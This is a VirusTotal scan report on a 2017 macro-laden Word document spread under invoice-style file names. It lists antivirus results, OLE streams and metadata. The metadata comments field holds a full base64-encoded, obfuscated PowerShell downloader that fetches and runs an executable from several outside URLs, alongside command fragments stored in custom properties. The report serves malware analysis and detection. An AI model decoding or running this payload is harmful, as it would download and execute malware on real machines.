× Cookies đã bị vô hiệu! Trang này yêu cầu kích hoạt cookies để có thể làm việc bình thường
SHA256: 6bf1ec3bc2f0a97bdca700f02a99db02543fc00e6e9e88bbc444e56c4f74dfc5
Tên tập tin: BNCKKK930.doc
Tỷ lệ phát hiện: 1 / 58
Ngày phân tích: 2017-07-31 05:51:49 UTC ( 1 năm, 9 tháng trước ) Xem mới nhất
Chương trình Kết quả Cập nhật
TrendMicro HEUR_VBA.O2 20170731
Ad-Aware 20170731
AegisLab 20170731
AhnLab-V3 20170731
Alibaba 20170731
ALYac 20170731
Antiy-AVL 20170731
Arcabit 20170731
Avast 20170731
AVG 20170731
Avira (no cloud) 20170730
AVware 20170731
Baidu 20170728
BitDefender 20170731
Bkav 20170729
CAT-QuickHeal 20170731
ClamAV 20170731
CMC 20170731
Comodo 20170731
CrowdStrike Falcon (ML) 20170710
Cylance 20170731
Cyren 20170731
DrWeb 20170731
Emsisoft 20170731
Endgame 20170721
ESET-NOD32 20170731
F-Prot 20170731
F-Secure 20170731
Fortinet 20170731
GData 20170731
Ikarus 20170730
Sophos ML 20170607
Jiangmin 20170731
K7AntiVirus 20170731
K7GW 20170731
Kaspersky 20170731
Kingsoft 20170731
Malwarebytes 20170731
MAX 20170731
McAfee 20170731
McAfee-GW-Edition 20170731
Microsoft 20170730
eScan 20170731
NANO-Antivirus 20170731
nProtect 20170731
Palo Alto Networks (Known Signatures) 20170731
Panda 20170730
Qihoo-360 20170731
Rising 20170731
SentinelOne (Static ML) 20170718
Sophos AV 20170731
SUPERAntiSpyware 20170731
Symantec 20170731
Symantec Mobile Insight 20170730
Tencent 20170731
TheHacker 20170730
TrendMicro-HouseCall 20170731
Trustlook 20170731
VBA32 20170728
VIPRE 20170731
ViRobot 20170731
Webroot 20170731
WhiteArmor 20170730
Yandex 20170728
Zillya 20170728
ZoneAlarm by Check Point 20170731
Zoner 20170731
The file being studied follows the Compound Document File format! More specifically, it is a MS Word Document file.
Commonly abused properties
The studied file makes use of macros, a macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically. Macros are often abused to perform malicious tasks when working with a document.
May create OLE objects.
Summary
creation_datetime
2017-07-30 21:07:00
template
Normal.dotm
page_count
1
last_saved
2017-07-30 21:08:00
revision_number
1
application_name
Microsoft Office Word
character_count
1
code_page
Latin I
comments
JAB7AHcAcwBgAGMAYABSAGkAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAZQAnACwAJwBuACcALAAnAHcALQBvAGIAagBlAGMAdAAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBXAFMAYwByACcALAAnAC4AUwBoACcALAAnAGUAbABsACcALAAnAGkAcAB0ACcAKQA7ACQAewB3AGUAYABCAEMAYABsAEkARQBOAHQAfQAgAD0AIAAmACgAIgB7ADAAfQB7ADMAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcAbgBlAHcALQBvAGIAJwAsACcAYwAnACwAJwB0ACcALAAnAGoAZQAnACkAIAAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAGwAaQBlAG4AdAAnACwAJwBTAHkAcwB0AGUAbQAnACwAJwAuAFcAZQBiAEMAJwAsACcALgBOAGUAdAAnACkAOwAkAHsAUgBBAE4AYABEAGAATwBNAH0AIAA9ACAAJgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAbgBlAHcALQBvACcALAAnAGoAZQBjACcALAAnAGIAJwApACAAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwByAGEAbgBkACcALAAnAG8AJwAsACcAbQAnACkAOwAkAHsAVQBgAFIATABTAH0AIAA9ACAAKAAiAHsAMwAxAH0AewAxADcAfQB7ADUAfQB7ADQAMAB9AHsAMgA4AH0AewAxADAAfQB7ADEAMgB9AHsAOAB9AHsAMwAyAH0AewAyADIAfQB7ADIANwB9AHsAMwAzAH0AewAxADgAfQB7ADMANgB9AHsAMQA2AH0AewAyADQAfQB7ADMANwB9AHsAMgAwAH0AewAwAH0AewAxADMAfQB7ADMAOQB9AHsAMgAxAH0AewAyADYAfQB7ADEANQB9AHsAMwB9AHsAMQB9AHsAMwA4AH0AewAxADQAfQB7ADQAfQB7ADIANQB9AHsANgB9AHsAMQAxAH0AewA3AH0AewAyADkAfQB7ADIAMwB9AHsAMwA0AH0AewAxADkAfQB7ADkAfQB7ADIAfQB7ADMAMAB9AHsAMwA1AH0AIgAtAGYAJwAvACcALAAnAGgAdAB0AHAAOgAvAC8AYwBzACcALAAnAG8AcgAuAGMAYQAvACcALAAnAEsALwAsACcALAAnAGUALgBlACcALAAnAHkAcwAnACwAJwBTAEEAcgAnACwAJwByAC8AJwAsACcALwAnACwAJwBkAG8AYwB0ACcALAAnACwAaAB0AHQAcAA6AC8ALwBwAGEAdQBsACcALAAnAEQAJwAsACcAcABsAHUAcwBhAC4AYwBvAG0AJwAsACcAYwAnACwAJwAuAHMAYQBuAGYAcgAnACwAJwBzACcALAAnAGUAcABoAGMAJwAsACcAdAB0AHAAOgAvAC8AbQBhAGMAcwAnACwAJwBvACcALAAnAHQAJwAsACcAYwBvAG0AJwAsACcAUwBWACcALAAnAGkAWQBLAEoARgBJAHUAJwAsACcAaAB0AHQAcAA6ACcALAAnAG8AJwAsACcAdQAvAFAAJwAsACcAdwAnACwAJwBqAC8ALABoAHQAdABwADoALwAnACwAJwBaAEMAeQAvACcALAAnACwAJwAsACcAagBnAGEAZQAnACwAJwBoACcALAAnAGoAVQAnACwAJwAvAGoAJwAsACcALwAvAGkAJwAsACcAUQAvACcALAAnAHMAJwAsACcAbgBzAHQALgAnACwAJwAtAHMAawBpAGwAdQBqACcALAAnAEIAeQBOACcALAAnAC4AYwBhAC8AWgBRAFIAJwApAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBwAGwAaQB0ACcALAAnAFMAJwApAC4ASQBuAHYAbwBrAGUAKAAnACwAJwApADsAJAB7AE4AYABBAG0AZQB9ACAAPQAgACQAewByAGAAQQBOAGQATwBtAH0ALgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHgAdAAnACwAJwBuAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQB0AEgAfQAgAD0AIAAkAHsARQBgAE4AVgA6AGAAVABlAE0AcAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBuAGEAYABtAEUAfQAgACsAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC4AZQAnACwAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAewB1AGAAUgBsAH0AIABpAG4AIAAkAHsAdQBgAFIAbABTAH0AKQB7AHQAcgB5AHsAJAB7AFcAYABlAEIAYABDAGwASQBlAGAATgB0AH0ALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcARABvAHcAbgBsAG8AYQAnACwAJwBlACcALAAnAGQARgBpAGwAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAVQBgAFIATAB9AC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAFQAbwAnACwAJwBTAHQAcgBpACcALAAnAG4AZwAnACkALgBJAG4AdgBvAGsAZQAoACkALAAgACQAewBQAGAAQQBUAEgAfQApADsALgAoACIAewA0AH0AewAzAH0AewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAHIAdAAnACwAJwBlAHMAcwAnACwAJwAtAFAAcgBvAGMAJwAsACcAdABhACcALAAnAFMAJwApACAAJAB7AFAAYABBAHQAaAB9ADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewAmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAHMAJwAsACcAdwByAGkAdABlAC0AaABvACcALAAnAHQAJwApACAAJAB7AF8AfQAuACIAZQB4AGMARQBQAGAAVABgAGkAbwBuACIALgAiAE0AZQBzAGAAUwBhAGAARwBlACIAOwB9AH0ADQAKAA==
Document summary
byte_count
57856
characters_with_spaces
1
line_count
1
version
1048576
paragraph_count
1
code_page
Latin I
OLE Streams
name
Root Entry
clsid
00020906-0000-0000-c000-000000000046
type_literal
root
clsid_literal
MS Word
sid
0
size
5632
type_literal
stream
size
114
name
\x01CompObj
sid
14
type_literal
stream
size
4096
name
\x05DocumentSummaryInformation
sid
5
type_literal
stream
size
4096
name
\x05SummaryInformation
sid
4
type_literal
stream
size
6951
name
1Table
sid
2
type_literal
stream
size
21670
name
Data
sid
1
type_literal
stream
size
412
name
Macros/PROJECT
sid
12
type_literal
stream
size
65
name
Macros/PROJECTwm
sid
13
type_literal
stream
size
6798
type
macro
name
Macros/VBA/Module1
sid
9
type_literal
stream
size
924
type
macro (only attributes)
name
Macros/VBA/ThisDocument
sid
10
type_literal
stream
size
3383
name
Macros/VBA/_VBA_PROJECT
sid
11
type_literal
stream
size
572
name
Macros/VBA/dir
sid
8
type_literal
stream
size
4096
name
WordDocument
sid
3
Macros and VBA code streams
[+] Module1.bas Macros/VBA/Module1 2636 bytes
create-ole
ExifTool file metadata
VsSQkWCjXD
ipt.S

SharedDoc
No

HyperlinksChanged
No

DhJcmCFoaj
hell

System
Windows

LinksUpToDate
No

HeadingPairs
Title, 1

Identification
Word 8.0

Template
Normal.dotm

CharCountWithSpaces
1

Word97
No

LanguageCode
English (US)

CompObjUserType
Microsoft Word 97-2003 Document

ModifyDate
2017:07:30 19:08:00

ScaleCrop
No

GWnIbjmzJs
pow

AUhRDVFTPp
WScr

Characters
1

TodvXKQqYD
ers

CodePage
Windows Latin 1 (Western European)

RevisionNumber
1

MIMEType
application/msword

Words
0

Lines
1

CreateDate
2017:07:30 19:07:00

Bytes
57856

AppVersion
16.0

ChNkfvLeBO
-e

Security
None

IDipRNuhMAGz
RPRPRPRPRP

Software
Microsoft Office Word

FileType
DOC

TotalEditTime
0

Pages
1

CompObjUserTypeLen
32

FileTypeExtension
doc

Paragraphs
1

LastPrinted
0000:00:00 00:00:00

DocFlags
Has picture, 1Table, ExtChar

File identification
MD5 27ec07cc6604112df505132903b6c1cd
SHA1 0bd7cde78ceb718b6c656461e8a69a25a29d64a1
SHA256 6bf1ec3bc2f0a97bdca700f02a99db02543fc00e6e9e88bbc444e56c4f74dfc5
ssdeep
768:auK9MokqFlWkNefm3yFXIH25Y8tXXevyh:aBuoBrJk6yFYH222

File size 56.5 KB ( 57856 bytes )
File type MS Word Document
Magic literal
CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Comments: JAB7AHcAcwBgAGMAYABSAGkAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAZQAnACwAJwBuACcALAAnAHcALQBvAGIAagBlAGMAdAAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsAMAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBXAFMAYwByACcALAAnAC4AUwBoACcALAAnAGUAbABsACcALAAnAGkAcAB0ACcAKQA7ACQAewB3AGUAYABCAEMAYABsAEkARQBOAHQAfQAgAD0AIAAmACgAIgB7ADAAfQB7ADMAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcAbgBlAHcALQBvAGIAJwAsACcAYwAnACwAJwB0ACcALAAnAGoAZQAnACkAIAAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAGwAaQBlAG4AdAAnACwAJwBTAHkAcwB0AGUAbQAnACwAJwAuAFcAZQBiAEMAJwAsACcALgBOAGUAdAAnACkAOwAkAHsAUgBBAE4AYABEAGAATwBNAH0AIAA9ACAAJgAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAbgBlAHcALQBvACcALAAnAGoAZQBjACcALAAnAGIAJwApACAAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwByAGEAbgBkACcALAAnAG8AJwAsACcAbQAnACkAOwAkAHsAVQBgAFIATABTAH0AIAA9ACAAKAAiAHsAMwAxAH0AewAxADcAfQB7ADUAfQB7ADQAMAB9AHsAMgA4AH0AewAxADAAfQB7ADEAMgB9AHsAOAB9AHsAMwAyAH0AewAyADIAfQB7ADIANwB9AHsAMwAzAH0AewAxADgAfQB7ADMANgB9AHsAMQA2AH0AewAyADQAfQB7ADMANwB9AHs, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Jul 29 20:07:00 2017, Last Saved Time/Date: Sat Jul 29 20:08:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0

TrID Microsoft Word document (54.2%)
Microsoft Word document (old ver.) (32.2%)
Generic OLE2 / Multistream Compound File (13.5%)
Tags
macros doc create-ole

VirusTotal metadata
First submission 2017-07-31 03:20:26 UTC ( 1 năm, 9 tháng trước )
Last submission 2018-07-12 10:31:52 UTC ( 10 tháng, 1 tuần trước )
Tên tập tin #67713 Invoice Notice.doc
New invoice #99590.doc
Invoice #820567.doc
Invoice 00001.doc
Invoice #25196.doc
Invoice #5111 Message.doc
Invoice #97412 Message.doc
New invoice #97882.doc
Invoice #080784.doc
New invoice - 047952.doc
Invoice number 232567 Notification.doc
Invoice due number 007556.doc
Copy Invoice 125206.doc
Invoice #4807 Message.doc
#278605 Invoice Notice.doc
New invoice #31900.doc
Invoice number 05637 Notification.doc
Invoice 1997.doc
Invoice #953193 Message.doc
Invoice number 62817 Notification.doc
Invoice due number 63682.doc
Invoice #50577.doc
Invoice #9748.doc
#41255 Invoice Notice.doc
Invoice number 61718 Notification.doc
Chưa có ý kiến nào. Chưa có thành viên nào trong Cộng đồng VirusTotal bình luận về đối tượng này, hãy trở thành người đầu tiên đưa ra ý kiến!

Đưa ra ý kiến của bạn...

?
Gửi ý kiến

Bạn chưa đăng nhập.Chỉ có người dùng đã đăng ký mới có thể viết ý kiến, hãy đăng nhập và bắt đầu!

Chưa có đánh giá. Chưa có thành viên nào đánh giá về đối tượng này, hãy trở thành người đầu tiên đánh giá nó!